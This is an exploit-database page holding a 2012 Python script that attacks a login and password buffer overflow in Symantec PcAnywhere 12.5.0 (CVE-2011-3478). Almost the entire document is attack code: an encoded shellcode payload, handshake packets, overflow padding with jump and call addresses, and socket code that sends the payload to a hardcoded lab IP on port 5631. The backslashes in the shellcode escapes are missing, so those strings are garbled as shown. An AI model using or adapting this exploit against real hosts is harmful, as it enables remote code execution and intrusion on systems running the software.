Home / exploits Symantec PcAnywhere 12.5.0 Buffer Overflow
Posted on 27 June 2012
#!/usr/bin/python # Exploit Title: Symantec PcAnywhere login and password field buffer overflow # Date: 2012.06.27 # Author: S2 Crew [Hungary] # Software Link: symantec.com # Version: 12.5.0 # Tested on: Windows XP SP2 # CVE: CVE-2011-3478 # Code : import socket import time import struct import string import sys shell = ( "xdaxdaxbbx9ex7fxfbx04xd9x74x24xf4x58x2bxc9" "xb1x56x31x58x18x03x58x18x83xc0x9ax9dx0exf8" "x4axe8xf1x01x8ax8bx78xe4xbbx99x1fx6cxe9x2d" "x6bx20x01xc5x39xd1x92xabx95xd6x13x01xc0xd9" "xa4xa7xccxb6x66xa9xb0xc4xbax09x88x06xcfx48" "xcdx7bx3fx18x86xf0xedx8dxa3x45x2dxafx63xc2" "x0dxd7x06x15xf9x6dx08x46x51xf9x42x7exdaxa5" "x72x7fx0fxb6x4fx36x24x0dx3bxc9xecx5fxc4xfb" "xd0x0cxfbx33xddx4dx3bxf3x3dx38x37x07xc0x3b" "x8cx75x1exc9x11xddxd5x69xf2xdfx3axefx71xd3" "xf7x7bxddxf0x06xafx55x0cx83x4exbax84xd7x74" "x1exccx8cx15x07xa8x63x29x57x14xdcx8fx13xb7" "x09xa9x79xd0xfex84x81x20x68x9exf2x12x37x34" "x9dx1exb0x92x5ax60xebx63xf4x9fx13x94xdcx5b" "x47xc4x76x4dxe7x8fx86x72x32x1fxd7xdcxecxe0" "x87x9cx5cx89xcdx12x83xa9xedxf8xb2xedx23xd8" "x97x99x41xdex06x06xcfx38x42xa6x99x93xfax04" "xfex2bx9dx77xd4x07x36xe0x60x4ex80x0fx71x44" "xa3xbcxd9x0fx37xafxddx2ex48xfax75x38x71x6d" "x0fx54x30x0fx10x7dxa2xacx83x1ax32xbaxbfxb4" "x65xebx0excdxe3x01x28x67x11xd8xacx40x91x07" "x0dx4ex18xc5x29x74x0ax13xb1x30x7excbxe4xee" "x28xadx5ex41x82x67x0cx0bx42xf1x7ex8cx14xfe" "xaax7axf8x4fx03x3bx07x7fxc3xcbx70x9dx73x33" "xabx25x83x7exf1x0cx0cx27x60x0dx51xd8x5fx52" "x6cx5bx55x2bx8bx43x1cx2exd7xc3xcdx42x48xa6" "xf1xf1x69xe3" ) init1 = ( "x00x00x00x00" # kezdeti handshake ) init2 = ( "x0dx06xfe" # Enter username uzenet koveti (NTdialog) ) init3 = ( "A" * 100 #+ " " #username ) readable_xp_sp2 = struct.pack('<L',0x023E5AD0) call_esi = struct.pack('<L',0x67f7aac4) jmp = struct.pack('<L',0x414112EB) init4 = ( "B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell)) ) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address print "init packet..." s.send(init1) # send the data time.sleep(5) data = s.recv(1024) print "handshake packet..." s.send(init2) # send the data time.sleep(5) data = s.recv(1024) print "username packet..." s.send(init3) # send the data time.sleep(5) #data = s.recv(1024) print "password packet..." s.send(init4) # send the data s.close()
